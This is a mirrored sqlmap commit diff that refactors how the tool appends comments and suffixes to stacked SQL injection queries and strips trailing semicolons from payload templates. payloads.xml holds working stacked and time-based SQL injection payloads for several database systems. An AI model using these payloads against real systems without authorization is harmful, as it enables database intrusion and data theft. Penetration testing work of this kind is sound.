sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-01-24 00:04:23 +03:00
Code Issues Packages Projects Releases Wiki Activity

Cleaning/refactoring of bunch of stacked/suffix/comment stuff (e.g.

Browse Source
This commit is contained in:
Miroslav Stampar 2012-09-26 11:27:43 +02:00
parent 6bc5f44b20
commit 687f3991de
6 changed files with 47 additions and 45 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
lib/controller/checks.py
View File

@ -500,7 +500,7 @@ def checkSqlInjection(place, parameter, value):
injection.os = Backend.setOs(dValue)
if vector is None and "vector" in test and test.vector is not None:
vector = "%s%s" % (test.vector, comment or "")
vector = test.vector
injection.data[stype] = AttribDict()
injection.data[stype].title = title

3
lib/controller/controller.py
View File

@ -128,12 +128,15 @@ def __formatInjection(inj):
for stype, sdata in inj.data.items():
title = sdata.title
vector = sdata.vector
comment = sdata.comment
if stype == PAYLOAD.TECHNIQUE.UNION:
count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1
title = re.sub(r"\d+ to \d+", str(count), title)
vector = agent.forgeInbandQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6])
if count == 1:
title = title.replace("columns", "column")
elif comment:
vector = "%s%s" % (vector, comment)
data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
data += " Title: %s\n" % title
data += " Payload: %s\n" % agent.adjustLateValues(sdata.payload)

15
lib/core/agent.py
View File

@ -189,8 +189,12 @@ class Agent:
expression = self.cleanupPayload(expression)
# User supplied --suffix nullifies any eventual payload comments
comment = None if conf.suffix is not None and suffix == conf.suffix else comment
# Take default values if None
suffix = kb.injection.suffix if kb.injection and suffix is None else suffix
if kb.technique and kb.technique in kb.injection.data:
where = kb.injection.data[kb.technique].where if where is None else where
comment = kb.injection.data[kb.technique].comment if comment is None else comment
if Backend.getIdentifiedDbms() == DBMS.ACCESS and comment == GENERIC_SQL_COMMENT:
comment = "%00"
@ -198,16 +202,13 @@ class Agent:
if comment is not None:
expression += comment
if where is None and kb.technique and kb.technique in kb.injection.data:
where = kb.injection.data[kb.technique].where
# If we are replacing (<where>) the parameter original value with
# our payload do not append the suffix
if where == PAYLOAD.WHERE.REPLACE:
pass
elif any([kb.injection.suffix, suffix]) and not (comment and not conf.suffix):
expression += " %s" % (kb.injection.suffix or suffix)
elif suffix and not comment:
expression += " %s" % suffix
return re.sub(r"(?s);\W*;", ";", expression)

3
lib/request/inject.py
View File

@ -466,9 +466,8 @@ def goStacked(expression, silent=False):
if conf.direct:
return direct(expression)
comment = queries[Backend.getIdentifiedDbms()].comment.query
query = agent.prefixQuery(";%s" % expression)
query = agent.suffixQuery(query, comment)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare=True)

3
lib/techniques/dns/use.py
View File

@ -71,9 +71,8 @@ def dnsUse(payload, expression):
expressionUnescaped = unescaper.unescape(expressionRequest)
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):
comment = queries[Backend.getIdentifiedDbms()].comment.query
query = agent.prefixQuery("; %s" % expressionUnescaped)
query = agent.suffixQuery(query, comment)
query = agent.suffixQuery(query)
forgedPayload = agent.payload(newValue=query)
else:
forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))

66
xml/payloads.xml
View File

@ -1072,13 +1072,13 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</vector>
<vector>; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR])</vector>
<request>
<payload>; IF(([RANDNUM]=[RANDNUM]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</payload>
<payload>; IF(([RANDNUM]=[RANDNUM]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR])</payload>
<comment>#</comment>
</request>
<response>
<comparison>; IF(([RANDNUM]=[RANDNUM1]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</comparison>
<comparison>; IF(([RANDNUM]=[RANDNUM1]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR])</comparison>
</response>
<details>
<dbms>MySQL</dbms>
@ -1092,13 +1092,13 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</vector>
<vector>; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>
<request>
<payload>; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</payload>
<payload>; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</payload>
<comment>--</comment>
</request>
<response>
<comparison>; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</comparison>
<comparison>; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</comparison>
</response>
<details>
<dbms>Microsoft SQL Server</dbms>
@ -1114,13 +1114,13 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>2</where>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</vector>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>
<request>
<payload>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</payload>
<payload>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</payload>
<comment>--</comment>
</request>
<response>
<comparison>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</comparison>
<comparison>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</comparison>
</response>
<details>
<dbms>PostgreSQL</dbms>
@ -1969,9 +1969,9 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]);</vector>
<vector>; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
<payload>; SELECT SLEEP([SLEEPTIME]);</payload>
<payload>; SELECT SLEEP([SLEEPTIME])</payload>
<comment>-- </comment>
</request>
<response>
@ -1990,9 +1990,9 @@ Formats:
<risk>2</risk>
<clause>0</clause>
<where>1</where>
<vector>; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]);</vector>
<vector>; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
<payload>; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'));</payload>
<payload>; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
<comment>-- </comment>
</request>
<response>
@ -2010,9 +2010,9 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END);</vector>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
<payload>; SELECT PG_SLEEP([SLEEPTIME]);</payload>
<payload>; SELECT PG_SLEEP([SLEEPTIME])</payload>
<comment>--</comment>
</request>
<response>
@ -2031,9 +2031,9 @@ Formats:
<risk>2</risk>
<clause>0</clause>
<where>1</where>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END);</vector>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
<payload>; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000);</payload>
<payload>; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
<comment>--</comment>
</request>
<response>
@ -2051,9 +2051,9 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END);</vector>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
<payload>; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]);</payload>
<payload>; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
<comment>--</comment>
</request>
<response>
@ -2073,9 +2073,9 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]';</vector>
<vector>; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
<request>
<payload>; WAITFOR DELAY '0:0:[SLEEPTIME]';</payload>
<payload>; WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
<comment>--</comment>
</request>
<response>
@ -2095,9 +2095,9 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL;</vector>
<vector>; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
<request>
<payload>; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL;</payload>
<payload>; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
<comment>--</comment>
</request>
<response>
@ -2115,9 +2115,9 @@ Formats:
<risk>2</risk>
<clause>0</clause>
<where>1</where>
<vector>; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL;</vector>
<vector>; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
<request>
<payload>; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5;</payload>
<payload>; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
<comment>--</comment>
</request>
<response>
@ -2135,9 +2135,9 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
<vector>; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
<request>
<payload>; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END;</payload>
<payload>; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
<comment>--</comment>
</request>
<response>
@ -2155,9 +2155,9 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END;</vector>
<vector>; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
<request>
<payload>; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END;</payload>
<payload>; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
<comment>--</comment>
</request>
<response>
@ -2175,9 +2175,9 @@ Formats:
<risk>2</risk>
<clause>0</clause>
<where>1</where>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END);</vector>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END)</vector>
<request>
<payload>; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))));</payload>
<payload>; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))</payload>
<comment>--</comment>
</request>
<response>
@ -2196,9 +2196,9 @@ Formats:
<risk>2</risk>
<clause>0</clause>
<where>1</where>
<vector>; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3),[RANDNUM]) FROM RDB$DATABASE;</vector>
<vector>; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3),[RANDNUM]) FROM RDB$DATABASE</vector>
<request>
<payload>; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3;</payload>
<payload>; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3</payload>
<comment>--</comment>
</request>
<response>